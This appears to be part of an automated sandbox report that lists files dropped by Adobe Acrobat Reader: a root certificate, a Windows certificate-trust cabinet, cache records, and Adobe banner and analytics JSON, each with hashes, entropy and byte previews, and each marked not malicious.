                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.7895108629891827
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFklo2vRltfllXlE/HT8k/hvNNX8RolJuRdxLlGB9lQRYwpDdt:kKxIRleT8gNMa8RdWBwRd
                                                                                        MD5:366E142F457BF64C2CEDE390AF0CA05C
                                                                                        SHA1:844E5B723916C6D0DD0418218670E7B8D379B030
                                                                                        SHA-256:7F194528CB9D5B2CBF5E9B436EF7B90E2AEA63610405023B1C8F4100A263399F
                                                                                        SHA-512:BE07B7BD68BBC8F657420BB92D2461F31F58382310A465C1A85FBCA5BA8085B7FD8CF97491493A6C60A598D06C3C7D7EBBA893BBE714702A63CAF06F2EBA176A
                                                                                        Malicious:false
                                                                                        Preview:p...... .........!..YJ..(....................................................... ..........W....>...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.144086598890895
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kK0DL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:lDnLNkPlE99SNxAhUe/3
                                                                                        MD5:D9E2EA28CD8CEE0DBDB20BFE164C6FA1
                                                                                        SHA1:BC79E69561113D61A5D32503F84A3DCC24814C86
                                                                                        SHA-256:7C7251A997B27B0447ED27B6F1E61216B3269F38E00A757D7273665964FF2ECD
                                                                                        SHA-512:10D3E7341B85E824B5EDA0D6A984249D8ED7B5A587A0898128D0A39122D84A32D706173DB53CDA8B54ED9C68466DC66A97508840ED180336FB1D7F453D7CF080
                                                                                        Malicious:false
                                                                                        Preview:p...... .........,&.ZJ..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):227002
                                                                                        Entropy (8bit):3.392780893644728
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
                                                                                        MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
                                                                                        SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
                                                                                        SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
                                                                                        SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
                                                                                        Malicious:false
                                                                                        Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.3304962384226435
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJM3g98kUwPeUkwRe9:YvXKXLLrDeyYpW7TZGMbLUkee9
                                                                                        MD5:E3FEDDA141477F9C01CD8317197DE0DF
                                                                                        SHA1:E226277375C11A04420535F97DF8E9564E92B331
                                                                                        SHA-256:8FC444FDC253D949288DAE5835CADA51ABD68E1EE79B32F9FBF892F1AE8C0D21
                                                                                        SHA-512:60B94F6BF845E28118AF65E076D60242DBEDCDD80E09CD6C1189CEB15331506FDA624F8C7FD4739AB0CF4B88AAFD2D8CC4B5DE0829563C378F492586D452F5DF
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.265379067012245
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfBoTfXpnrPeUkwRe9:YvXKXLLrDeyYpW7TZGWTfXcUkee9
                                                                                        MD5:92E2C91E666C11FBBD376D3DADA9ED97
                                                                                        SHA1:23D06DAEA833AB772E5748659620BE6DA9614FCE
                                                                                        SHA-256:9407F5B4E6E4ED865617D8C84C1E9052044ED88300DFFF541DED36A0DB9787F0
                                                                                        SHA-512:85DC37AE65D74370A031CAF336FD54959DBA71265B0F71326156BD1A0677EEE15EAFC4D7B32C97311DDA33F22A0392CB4183CC2C2CA61005B17FC6BE39825DB9
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.244200142057843
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfBD2G6UpnrPeUkwRe9:YvXKXLLrDeyYpW7TZGR22cUkee9
                                                                                        MD5:69FE6D3453F731B3D3BACCB79380503B
                                                                                        SHA1:0C0A1561C67CA9D3F16EF057125F23AEBBFCA4D9
                                                                                        SHA-256:F5BD396C81BFB0C9310B82896BB46541AC7F13DBA3837ADC26956F924C1D88EE
                                                                                        SHA-512:115C7AB66E9659D2213CBA4D004927BB039843424E5A649C90BBFD5A0776162AE52D241AC0422A9CAA4EF90732CFA66EE8C6EB006957D9F3635E7F35BDF9CC32
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.308235882817122
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfPmwrPeUkwRe9:YvXKXLLrDeyYpW7TZGH56Ukee9
                                                                                        MD5:A9BFC2BF2A11BF95874FD09EBABB5566
                                                                                        SHA1:83C2A68FFA6C8C4E4D45176967C1465540BF018D
                                                                                        SHA-256:FD0DEDDC510DD5C57F245D00959E44B7A334EC3E862AE86233D0DCF3116E900C
                                                                                        SHA-512:1CC65B41BEA8D53D0783C37CB489780A77AEEFE8FC901E8558BA9E4340DC1EE4F64898E24019B425E3FDB0D6F8C3D8148F60F797453219EEC089BCD7117D0098
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.685821090486146
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XfX+iT+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSL3:YvqZT+hgy6SAFv5Ah8cv/L3
                                                                                        MD5:6B5153E7534B79E09DF26FED236464A6
                                                                                        SHA1:8206347B0D3A83EE119B18348513960C6D5CF37C
                                                                                        SHA-256:6CDE5F3A8DB3EC23BA1CAA37968C47D6147CECEADC489231BE7DBBF660CF82E7
                                                                                        SHA-512:6C157CAD4C541F9ACE7F1C76D3CF266D702F400C0B6CFF07FF0DA86B23CF300BE56B677D0B3E3C6783323DB558589D319581FAA432E5098E933A5B36BB5717EE
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1122
                                                                                        Entropy (8bit):5.676831136841287
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XfX+iToVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdB63:YvqZToFgSNycJUAh8cvYH13
                                                                                        MD5:B77C3E5AD201C5CCD22E4855649C8DE3
                                                                                        SHA1:59D1D94B54C15B444B4E6D1AAF3003BFB14B838C
                                                                                        SHA-256:9718C8DA08D06F110C794D28AE7380526DCBDED494F6D4B51B0514B8AB027995
                                                                                        SHA-512:FE32FC5BFF38BDC4F1219833CEA7A838F9125BE4D89EE4554A6153BC07A9A1E1F61306FE9BF1983C4604C95AEF36046D228B10AF20FFE2FE438D67E3E70B339B
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.254197473624295
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfQ1rPeUkwRe9:YvXKXLLrDeyYpW7TZGY16Ukee9
                                                                                        MD5:BCD2A899E6A76E4390A778FBBD8F04CF
                                                                                        SHA1:E1A208F98BBEEBA7666E9DECCAB67771691ADD79
                                                                                        SHA-256:E5360C20412A4ED4AFBE1CC41EA7100E134F192E2EA0A5A8F4E1035B101376D9
                                                                                        SHA-512:1DE778EA3E83589FC106755AC03AE46015101800DA7CBBAEC1225DE942BE6745888BDFA0F3AD186B96FC68833705439AA716011DF82AEF951466083C89C35D81
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1102
                                                                                        Entropy (8bit):5.668957389474947
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XfX+iTt2LgErcXWl7y0nAvzIBcSJCBViV63:YvqZTtogH47yfkB5kVL3
                                                                                        MD5:12BEFD339E7D845087839ACA9E3C675D
                                                                                        SHA1:A97437472DF4D68B78DA44BC24B81B281BD83E5C
                                                                                        SHA-256:2072C50D22F542CCCE3E1DF30AF485AFD762C1879D721E3426C6E2CAA14BEAF9
                                                                                        SHA-512:BF54F1D1A4DC228D16E0EC7A2A7288F0483435F46712C805BBFBA80B3F53C98B33860947A1077022FE20F7649A55FF3B281D206D9875E9E4AA684ED2B3ED44F2
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1164
                                                                                        Entropy (8bit):5.699924662572396
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XfX+iTFKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK563:YvqZTFEgqprtrS5OZjSlwTmAfSKc3
                                                                                        MD5:4B348C978AECE22445AB097B76B9BEF8
                                                                                        SHA1:00A3CEA4AD21792D27275956F2EF5AD71ECE6BBF
                                                                                        SHA-256:FF1C155063D8112765A042C5D7E3B8B43CCD588D2F26DF6A7C93DEB65AD32B68
                                                                                        SHA-512:A16C9E3612E7FDA9ADDB9F2561D8058FCDC6AECEB4FEAC82F1336230DEAE7AC898CF597A54E97C503073CC93E036D1EB44D79955E5C4EAFED423AB0F6CD760CC
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.260710684260725
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfYdPeUkwRe9:YvXKXLLrDeyYpW7TZGg8Ukee9
                                                                                        MD5:DB2799D0ECFA8FCAFC76A1494E00B64A
                                                                                        SHA1:39E934C1380D996C7C9729B4E2089DD3A9DCEEC7
                                                                                        SHA-256:3CC1F776A4AE4AE87328D9E8B163A85F1CAE273A95B990F86318A6EC3DD8E2D9
                                                                                        SHA-512:BF6D78C6C35BD2B38F18FECF86E75B2F7EAEA745242375544BA5FDD13573669CA203C91EA471EE88F2EAC862343F40690373B80191F20A450BAF933F2A790641
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.246650697398791
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJf+dPeUkwRe9:YvXKXLLrDeyYpW7TZG28Ukee9
                                                                                        MD5:BEF4695C2C9648C5B074A7E46F7F1057
                                                                                        SHA1:6B6908CF1C7AFF636365478DDCACD9754BC9CC7B
                                                                                        SHA-256:F6EDF262D574CF865479EED68D077883574700ADA7939ECA784487B68E3AC323
                                                                                        SHA-512:E0B24AC20C8C6D4E5F78A8290455C3A2F2CC0AF743EC13A03E868621919AC8BF75E76E3A3B520C1A5CB5C72F3CCBC54D6FA78EA7ED37F875EBC3B32853F49AF0
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.244527811596027
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfbPtdPeUkwRe9:YvXKXLLrDeyYpW7TZGDV8Ukee9
                                                                                        MD5:B73E28FC5E76A77FAB1408CF58575836
                                                                                        SHA1:EA3E9C966A192280555A1A7E428EC11DDB22F885
                                                                                        SHA-256:9C1B33081FBEA012622E3A312808B8B1D6D7DF3CF38002A63DBA500B2F57EC5E
                                                                                        SHA-512:55BE08CD2EE84ED5D4BAD0E924CF11CAD6E7323860F1C96A0CCF1DEAC8C95642971CA7AD6AA95843A48508885B33457544C72232684208E2D1FC89C4D86B420A
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.2456572080769055
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJf21rPeUkwRe9:YvXKXLLrDeyYpW7TZG+16Ukee9
                                                                                        MD5:9D7A41110B3054242DFFB7CDAE7D2138
                                                                                        SHA1:F50A4F1D75A4B169250A845F544BF5918EE9A8EF
                                                                                        SHA-256:A31F99C7DB39F72468A36AD0DD8BDC433834287968ED9CE6D9ABB5114A3D454E
                                                                                        SHA-512:7D65E6799763D3C7B383B3AAD8664A30CEBD271F06DF4D871BADCB885D6519D54AA33687FF384810743374F1CB5D63DF74CC5B1D258ACFF1AEE27085F7A577A4
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.6612182565602245
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XfX+iTiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSL3:YvqZT8BgkDMUJUAh8cvML3
                                                                                        MD5:FA0AFF6471EE85F7F052026FBE289C0E
                                                                                        SHA1:684809F768EC16B9099E92FB65D0930C3B911275
                                                                                        SHA-256:2498BCC1AE7C4BF674B61B6CE3C93DBACADFEFE0BBE6B2D092F9788D6BF828D7
                                                                                        SHA-512:0E6E8DCA06C1AEE51C0BEBFB01DD0B1913297041F500296C0B94FF710B8E2496DA2902555C70E731CF9B1F49D3038CC32FC541BD4B650162053F99EE0B9CF388
                                                                                        Malicious:false
